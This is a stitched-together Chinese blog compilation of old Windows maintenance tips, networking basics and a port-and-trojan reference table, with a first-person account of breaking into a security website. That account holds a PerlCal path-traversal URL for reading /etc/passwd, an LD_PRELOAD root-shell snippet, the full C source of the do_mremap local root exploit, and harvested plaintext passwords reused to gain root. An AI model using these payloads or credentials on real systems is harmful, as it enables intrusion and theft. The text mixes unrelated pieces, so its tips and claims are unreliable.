刪蒢々記憶

1、用 Win 98启动盘启动系统，运行Fdisk，在Fdisk主菜单中选择第3项“Delete partition or Logical Drive”，在下一屏幕中选择第4项“Delete Non-DOS Partition”(删除非DOS分区)。
2、此时可以看到第一项中显示的是NTFS格式分区(Fdisk将它认成Non-DOS分区)，将它删除。
3、重启电脑，运行Fdisk，在Fdisk主菜单中选择第1项，把刚删除非DOS分区腾出的空间全部建成主DOS分区。按ESC退回后，再将刚建立的主DOS分区设置为活动分区。
4、格式化C盘后，即可重装Win 98。

　　另外：如果你有Win 2000安装盘，还可以用Win 2000来删除NTFS分区。放入Win 2000安装盘，然后将系统设置为从光盘启动。启动后开始安装Win 2000。在选择安装的分区以及分区的格式时，选择是NTFS格式的分区，并更改分区格式为FAT32。更改完毕后，就可以重新启动系统，格式化C盘并安装Win 98。

刪蒢々記憶

　　问：我使用的是Windows 98和Windows 2000双操作系统，里面有很多不满意的屏幕保护和壁纸。我想请教一下，用什么办法可以删除它们？

　　答：Windows 98默认的屏幕保护都在C:\Windows下，文件后缀名是.scr，该目录下有一些壁纸，后缀名是.bmp。另外C:\Windows\Web\Wallpaper中也有部分壁纸。Windows 2000默认的屏幕保护都在C:\Winnt\System32\下，后缀名也是.scr。壁纸在C:\Winnt\Web\Wallpaper\和C:\Documents and Settings\账户名\My Documents\My Pictures\下。在这些路径下找到不满意的文件后即可删除。

刪蒢々記憶

　　问：在“开始菜单”中的“运行”项中输入“msconfig”之后选择“启动”选项卡，可以看到很多开机时自启动的软件名，可有些我永远也不想开机启动，又不想它出现在此选项卡中，请问能否将它们彻底删除？

　　答：打开注册表编辑器，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
以及“开始菜单→程序→启动”中查找你不需要的项并删除。另外也可以使用一些软件清理，例如超级兔子魔法设置等。

刪蒢々記憶

　　问：我在电脑中已经删除了Winamp，但是右击某些文件夹时，右键菜单中依然会有“用Winamp播放”等选项。请问怎样删除它们？

　　答：打开注册表：找到HKEY_LOCAL_MACHINE\Software\CLASSES\Folder\shell\
HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell\
两个键值，看看是否有相应的键值。并且在注册表查找“Winamp”等关键字，删除相应的键值即可。注意删除前清洗备份注册表！

刪蒢々記憶

　　问：我的电脑安装的是Windows 2000。最近在上网时老是会跳出一个窗口，标题栏上显示是信使服务，内容经常是些广告，用系统信息中的正在运行的任务查看是c:\windows\system32\mmc.exe这个程序在运行，但是删除掉这个程序不到一分钟，它又出来了，也就是一直删不掉，不知道这个问题怎么解决？

　　答：这是Windows 2000里面自带的信使服务。打开“我的电脑”，点击“控制面板”，双击“管理工具”后点“服务”选项，找到Messenger，双击打开Messenger属性，把启动类型设置为手动，然后点击停止按钮，最后点击确定就可以关闭这个服务了。

刪蒢々記憶

　　问：最近我安装了一个虚拟光驱软件，可当我卸载它以后，“我的电脑”里由它创建的光驱盘符图标却一直留在那里，怎么也去不掉，请问该怎么解决？

　　答：你卸载时可能出了问题，如果系统是Windows 2000或Windows XP，你可以在“控制面板→系统→性能维护→设备管理器”中，在“CD-ROM”下，卸载掉你的虚拟光驱(一般名为xxx SCSI CD-ROM DEVICE)；如果系统是Windows 98，你可以在注册表中删除虚拟光盘图标，运行“regedit”找到HKEY_LOCAL_MACHINE\Enum\SCSI项，下面几个子键分别对应虚拟光盘和物理光驱，把对应虚拟光盘的子键(子键名含有SCSI字符)全部删除即可。

刪蒢々記憶

我们在Windows XP中使用程序时，大部分程序在使用当中会有一个活动图标显示在任务栏“时间显示”的右侧（系统托盘区）。而在任务栏属性中的通知区域里，有一个叫“隐藏不活动的图标”选项，如果勾选了该项，那么系统就会自动记录曾经在系统托盘区显示过程序活动图标。点击该选项的“自定义”按钮，就会在“过去的项目”一栏中看到很多历史记录。
要删除这些内容也很简单，在“开始→运行”中键入regedit，打开注册表编辑器，展开“HKEY_CURRENT_US ER\Software\Microsoft\Windows\Curr entVersion\Explorer\TrayNotify”分支，其中“IconStreams”和“PastIconStream”项中分别存储着“当前项目”和“过去的项目”，将“TrayNotify”项删除，按Ctrl+Alt+Del组合键调出“Windows任务管理器”，单击进程选项卡，选择explorer.exe，结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”，在“创建新任务”中输入explorer.exe即可。

刪蒢々記憶

前言：
这个入侵是发生在2004年4月左右。
主要过程中有利用的do_mremap VMA的本地提升权限的漏洞 也是刚出不久
所以说运气占一大半！我最早看到是在国外站点isec.pl公布的 后又在CVE看到。 应该是ihaquer大牛发现的吧。我也没仔细看。
所以说也是运气 漏洞是当时新发现的。而之前的2003年11月发现的do_brk()的漏洞才让我享受了什么叫爽。 当时这漏洞没被kernel开发人员所重视。所以导致国内外很多linux hacker利用这个拿到了一些server的ROOT。不过这个漏洞当时主要是知道的人少，要不是在一个论坛看到，我还真不知道~

没有任何技术含量！目的在告诉他人，要谨防密码重复使用的问题。

这篇文章介绍的是入侵国内一个著名安全站点过程的笔记。过程很复杂。希望多各位有所帮助。要是不利用社会工程学，估计拿不下来。
C:/Documents and Settings/Administrator>ping www.xxx.com

Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Ping statistics for 192.168.0.252:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms


文章中IP为假的 在这里不公布真正IP
如有雷同，纯熟巧合。
看TTL的返回信息判断系统应该不是真的 现在可以改这个
先扫描他看看吧
结果只开了 21 22 80
看来成功率不算打 FTP并没有若口令 80也没什么信息
看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。
首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。
看看服务器开的端口情况
开了 21 22 80 也没什么漏洞
在看看news.xxx.com
经过扫描 判断服务器应该是 NT/2000
21 80 389 1002 3389
基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧 登陆看看系统
2000server的
news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。
有点郁闷了
jswz.xxx.com
也是一个分页 不过这个另我非常的意外 用的是cgi,php的 系统是linux。
21 22 80
扫了一下有个漏洞
cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来
去了国外的几个站 终于发现了~~~
Name : PerlCal
About : cal_make.pl of the PerlCal script may allow remote users(website visitors) to view any file on a webserver

(dependingon the user the webserver is running on).

Exploit:

http://www.VULNERABLE.com/cgi-bin/cal_make.pl?/
p0=../../../../../../../../../../../../etc/passwd%00
by: stan (stan@whizkunde.org)

呵呵 感谢hack.co.za
在浏览器地址栏输入
http://jswz.xxx.com/cgi-bin/perlcal/cal_ma..../etc/passwd%00
好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃！
想办法 跑这些用户吧~~~
提炼用户名 希望有弱口令
提炼过程大家参考一些资料去吧
一共20多个用户 跑出来了2个 哈哈。。~~
用SSH登陆~
权限似乎非常低
用第二个试试
哎 还是一样
看看提升权限吧~~
经过一番折腾 100%确定是rh73 内核Linux kernel 2.4
用do_brk的益出~
#include <stdio.h>


#include <stdlib.h>


#include <unistd.h>


char hellc0de[] =


"/x69/x6e/x74/x20/x67/x65/x74/x75/x69/x64/x28/x29/x20/x7b/x20/x72/x65"


"/x74/x75/x72/x6e/x20/x30/x3b/x20/x7d/x0a/x69/x6e/x74/x20/x67/x65/x74"


"/x65/x75/x69/x64/x28/x29/x20/x7b/x20/x72/x65/x74/x75/x72/x6e/x20/x30"


"/x3b/x20/x7d/x0a/x69/x6e/x74/x20/x67/x65/x74/x67/x69/x64/x28/x29/x20"


"/x7b/x20/x72/x65/x74/x75/x72/x6e/x20/x30/x3b/x20/x7d/x0a/x69/x6e/x74"


"/x20/x67/x65/x74/x65/x67/x69/x64/x28/x29/x20/x7b/x20/x72/x65/x74/x75"


"/x72/x6e/x20/x30/x3b/x20/x7d/x0a/x0/bin/sh";


int main()


{


FILE *fp;


char *offset;


fp=fopen("/tmp/own.c","w");


fprintf(fp,"%s",hellc0de);


fclose(fp);


system("gcc -shared -o /tmp/own.so /tmp/own.c;rm /tmp/own.c");


system("LD_PRELOAD=/tmp/own.so /bin/sh");


return 0;


}


结果没有作用。失败。
想别的办法
试试 do_mremap VMA本地权限提升漏洞
Linux内核中mremap(2)系统调用由于没有对函数返回值进行检查，本地攻击者可以利用这个漏洞获得root用户权限。

mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。mremap()系统调用提供对已存在虚拟内存区域调整大小。从VMA区域移动部分虚拟内存到新的区域需要建立一个新的VMA描述符，也就是把由VMA描述的下面的页面表条目(page table entries)从老的区域拷贝到进程页表中新的位置。

要完成这个任务do_mremap代码需要调用do_munmap()内部内核函数去清除在新位置中任何已经存在的内存映射，也就是删除旧的虚拟内存映射。不幸的是代码没有对do_munmap()函数的返回值进行检查，如果可用VMA描述符的最大数已经超出，那么函数调用就可能失败。
：）：）：）

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>

#include <asm/page.h>


#define str(s) #s
#define xstr(s) str(s)

// this is for standard kernels with 3/1 split
#define STARTADDR 0x40000000
#define PGD_SIZE (PAGE_SIZE * 1024)
#define VICTIM (STARTADDR + PGD_SIZE)
#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)

#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)

#define MREMAP_MAYMOVE ( (1UL) << 0 )
#define MREMAP_FIXED ( (1UL) << 1 )

#define __NR_sys_mremap __NR_mremap


// how many ld.so pages? this is the .text section length (like from cat
// /proc/self/maps) in pages
#define LINKERPAGES 0x14

// suid victim
static char *suid="/bin/ping";

// shell to start
static char *launch="/bin/bash";


_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
unsigned long new_len, unsigned long flags,
unsigned long new_addr);

static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
static int i, pid=0;
static char *env[2], *argv[2];
static ulong ret;


// code to appear inside the suid image
static void suid_code(void)
{
__asm__(
" call callme /n"

// setresuid(0, 0, 0), setresgid(0, 0, 0)
"jumpme: xorl %ebx, %ebx /n"
" xorl %ecx, %ecx /n"
" xorl %edx, %edx /n"
" xorl %eax, %eax /n"
" mov $"xstr(__NR_setresuid)", %al /n"
" int $0x80 /n"
" mov $"xstr(__NR_setresgid)", %al /n"
" int $0x80 /n"

// execve(launch)
" popl %ebx /n"
" andl $0xfffff000, %ebx /n"
" xorl %eax, %eax /n"
" pushl %eax /n"
" movl %esp, %edx /n"
" pushl %ebx /n"
" movl %esp, %ecx /n"
" mov $"xstr(__NR_execve)", %al /n"
" int $0x80 /n"

// exit
" xorl %eax, %eax /n"
" mov $"xstr(__NR_exit)", %al /n"
" int $0x80 /n"

"callme: jmp jumpme /n"
);
}


static int suid_code_end(int v)
{
return v+1;
}


static inline void get_esp(void)
{
__asm__(
" movl %%esp, %%eax /n"
" andl $0xfffff000, %%eax /n"
" movl %%eax, %0 /n"
: : "m"(old_esp)
);
}


static inline void cloneme(void)
{
__asm__(
" pusha /n"
" movl $("xstr(CLONEFL)"), %%ebx /n"
" movl %%esp, %%ecx /n"
" movl $"xstr(__NR_clone)", %%eax /n"
" int $0x80 /n"
" movl %%eax, %0 /n"
" popa /n"
: : "m"(pid)
);
}


static inline void my_execve(void)
{
__asm__(
" movl %1, %%ebx /n"
" movl %2, %%ecx /n"
" movl %3, %%edx /n"
" movl $"xstr(__NR_execve)", %%eax /n"
" int $0x80 /n"
: "=a"(ret)
: "m"(suid), "m"(argv), "m"(env)
);
}


static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;

memset((void*)addr, 0x90, PAGE_SIZE);
r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
ptr = (void*) (addr + PAGE_SIZE);
ptr -= r+1;
memcpy(ptr, suid_code, r);
memcpy((void*)addr, launch, strlen(launch)+1);
}


// hit VMA limit & populate PTEs
static void exhaust(void)
{
// mmap PTE donor
t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t)
goto failed;

// prepare shell code pages
for(i=2; i<LINKERPAGES+1; i++)
pte_populate(victim + PAGE_SIZE*i);
i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
if(i)
goto failed;

// lock unmap
base = MMAP_BASE;
cnt = 0;
prot = PROT_READ;
printf("/n"); fflush(stdout);
for(;;) {
t = mmap((void*)base, PAGE_SIZE, prot,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t) {
if(ENOMEM==errno)
break;
else
goto failed;
}
if( !(cnt%512) || cnt>65520 )
printf("/r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
base+PAGE_SIZE); fflush(stdout);
base += PAGE_SIZE;
prot ^= PROT_EXEC;
cnt++;
}

// move PTEs & populate page table cache
ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
if(-1==ret)
goto failed;

munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
0);
if(MAP_FAILED==t)
goto failed;

*t = *((unsigned *)old_esp);
munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
printf("/n[+] Success/n/n"); fflush(stdout);
return;

failed:
printf("/n[-] Failed/n"); fflush(stdout);
_exit(0);
}


static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;

uname(&un);
n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
if(n!=3 || a!=2) {
printf("/n[-] invalid kernel version string/n");
_exit(0);
}

if(b==2) {
if(c<=25)
v=1;
}
else if(b==3) {
if(c<=99)
v=1;
}
else if(b==4) {
if(c>18 && c<=24)
v=1, e=1;
else if(c>24)
v=0, e=0;
else
v=1, e=0;
}
else if(b==5 && c<=75)
v=1, e=1;
else if(b==6 && c<=2)
v=1, e=1;

printf("/n[+] kernel %s vulnerable: %s exploitable %s",
un.release, v? "YES" : "NO", e? "YES" : "NO" );
fflush(stdout);

if(v && e)
return;
_exit(0);
}


int main(int ac, char **av)
{
// prepare
check_kver();
memset(env, 0, sizeof(env));
memset(argv, 0, sizeof(argv));
if(ac>1) suid=av[1];
if(ac>2) launch=av[2];
argv[0] = suid;
get_esp();

// mmap & clone & execve
exhaust();
cloneme();
if(!pid) {
my_execve();
} else {
waitpid(pid, 0, 0);
}

return 0;
}


这次成功了（运气吧）
整理了一些机器上的文件 然后看看有什么可以利用的信息没。 呵呵mailuserinfo 看看这里写的什么~
admin e04i9zs8#$%
kelzr zjjjwoai22@
sunzsdk 2z2z2z2z2z2z2z2z
wollf woainiliaoynx
记得主站上有这几个管理员~ 去找登陆的地方
www.xxx.com/login.php
您的IP未被允许登陆
晕了
用SSH登陆192.168.0.252试试
果然登陆进来了 用户名是kelzr 密码是 woainiliaoynx
呵呵 试了2分钟
登陆后发现权限竟然不是root 哭了
试了3个提升权限的竟然没有用
郁闷ING
郁闷中发现一个login的记录 是这个机器登陆另一个机器的记录 密码是明文
登陆的是192.168.0.2 用户名admin 密码mozjkelzlf152@ 是FTP登陆
看来是他估计写下来的
我突然冒出个想法 ：）
断开连接 重新用SSH连接主机 root mozjkelzlf152@  结果进来了
既然已经到有了ROOT权限，就已经达到目的了。
忠告：
大家最好养成一个习惯 尽量避免密码重复,社会工程学不容忽视。
此问也算回忆录吧。是入侵以后的回忆。如果有错误请见量。

刪蒢々記憶

数据在INTERNET上的传输方式数据在INTERNET上是以数据包为单位传输的，每包nK，不多也不少。这就是说，不管你的网有多好，你的数据都不会是以线性（就象打电话一样）传输的，中间总是有空洞的。数据包的传输，不可能百分之百的能够完成，因为种种原因，总会有一定的损失。碰到这种情况，INTERNET会自动的让双方的电脑根据协议来补包。如果你的线路好，速度快，包的损失会非常小，补包的工作也相对较易完成，因此可以近似的将你的数据看做是无损传输。但是，如果你的线路较差（如用猫），数据的损失量就会非常大，补包工作也不可能百分之百完成。在这种情况下，数据的传输就会出现空洞，造成丢包。

刪蒢々記憶

　　在网络技术中，端口（Port）大致有两种意思：一是物理意义上的端口，比如，ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口，如RJ-45端口、SC端口等等。二是逻辑意义上的端口，一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。


查看端口
　　在Windows 2000/XP/Server 2003中要查看端口，可以使用Netstat命令：
　　依次点击“开始→运行”，键入“cmd”并回车，打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”，按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。

关闭/开启端口
　　在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。

关闭端口
　　比如在Windows 2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol （SMTP）”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。

开启端口
　　如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，单击“确定”按钮即可。
提示：在Windows 98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。
端口分类

逻辑意义上的端口有多种分类标准，下面将介绍两种常见的分类：

1. 按端口号分布划分

（1）知名端口（Well-Known Ports）
　　知名端口即众所周知的端口号，范围从0到1023，这些端口号一般固定分配给一些服务。比如21端口分配给FTP服务，25端口分配给SMTP（简单邮件传输协议）服务，80端口分配给HTTP服务，135端口分配给RPC（远程过程调用）服务等等。

（2）动态端口（Dynamic Ports）
　　动态端口的范围从1024到65535，这些端口号一般不固定分配给某个服务，也就是说许多服务都可以使用这些端口。只要运行的程序向系统提出访问网络的申请，那么系统就可以从这些端口号中分配一个供该程序使用。比如1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后，就会释放所占用的端口号。
　　不过，动态端口也常常被病毒木马程序所利用，如冰河默认连接端口是7626、WAY 2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。

2. 按协议类型划分
　　按协议类型划分，可以分为TCP、UDP、IP和ICMP（Internet控制消息协议）等端口。下面主要介绍TCP和UDP端口：

（1）TCP端口
　　TCP端口，即传输控制协议端口，需要在客户端和服务器之间建立连接，这样可以提供可靠的数据传输。常见的包括FTP服务的21端口，Telnet服务的23端口，SMTP服务的25端口，以及HTTP服务的80端口等等。

（2）UDP端口
　　UDP端口，即用户数据包协议端口，无需在客户端和服务器之间建立连接，安全性得不到保障。常见的有DNS服务的53端口，SNMP（简单网络管理协议）服务的161端口，QQ使用的8000和4000端口等等。
常见网络端口

网络基础知识!端口对照

端口：0
服务：Reserved
说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

端口：1
服务：tcpmux
说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

端口：7
服务：Echo
说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。

端口：19
服务：Character Generator
说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

端口：21
服务：FTP
说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

端口：22
服务：Ssh
说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。

端口：23
服务：Telnet
说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

端口：25
服务：SMTP
说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

端口：31
服务：MSG Authentication
说明：木马Master Paradise、Hackers Paradise开放此端口。

端口：42
服务：WINS Replication
说明：WINS复制

端口：53
服务：Domain Name Server（DNS）
说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

端口：67
服务：Bootstrap Protocol Server
说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

端口：69
服务：Trival File Transfer
说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。

端口：79
服务：Finger Server
说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。

端口：80
服务：HTTP
说明：用于网页浏览。木马Executor开放此端口。

端口：99
服务：Metagram Relay
说明：后门程序ncx99开放此端口。

端口：102
服务：Message transfer agent(MTA)-X.400 over TCP/IP
说明：消息传输代理。

端口：109
服务：Post Office Protocol -Version3
说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

端口：110
服务：SUN公司的RPC服务所有端口
说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

端口：113
服务：Authentication Service
说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。

端口：119
服务：Network News Transfer Protocol
说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。

端口：135
服务：Location Service
说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。

端口：137、138、139
服务：NETBIOS Name Service
说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

端口：143
服务：Interim Mail Access Protocol v2
说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。

端口：161
服务：SNMP
说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

端口：177
服务：X Display Manager Control Protocol
说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。

端口：389
服务：LDAP、ILS
说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

端口：443
服务：Https
说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。

端口：456
服务：[NULL]
说明：木马HACKERS PARADISE开放此端口。

端口：513
服务：Login,remote login
说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

端口：544
服务：[NULL]
说明：kerberos kshell

端口：548
服务：Macintosh,File Services(AFP/IP)
说明：Macintosh,文件服务。

端口：553
服务：CORBA IIOP （UDP）
说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

端口：555
服务：DSF
说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

端口：568
服务：Membership DPA
说明：成员资格 DPA。

端口：569
服务：Membership MSN
说明：成员资格 MSN。

端口：635
服务：mountd
说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。

端口：636
服务：LDAP
说明：SSL（Secure Sockets layer）

端口：666
服务：Doom Id Software
说明：木马Attack FTP、Satanz Backdoor开放此端口

端口：993
服务：IMAP
说明：SSL（Secure Sockets layer）

端口：1001、1011
服务：[NULL]
说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。

端口：1024
服务：Reserved
说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。

端口：1025、1033
服务：1025：network blackjack 1033：[NULL]
说明：木马netspy开放这2个端口。

端口：1080
服务：SOCKS
说明：这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。

端口：1170
服务：[NULL]
说明：木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。

端口：1234、1243、6711、6776
服务：[NULL]
说明：木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。

端口：1245
服务：[NULL]
说明：木马Vodoo开放此端口。

端口：1433
服务：SQL
说明：Microsoft的SQL服务开放的端口。

端口：1492
服务：stone-design-1
说明：木马FTP99CMP开放此端口。

端口：1500
服务：RPC client fixed port session queries
说明：RPC客户固定端口会话查询

端口：1503
服务：NetMeeting T.120
说明：NetMeeting T.120

端口：1524
服务：ingress
说明：许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。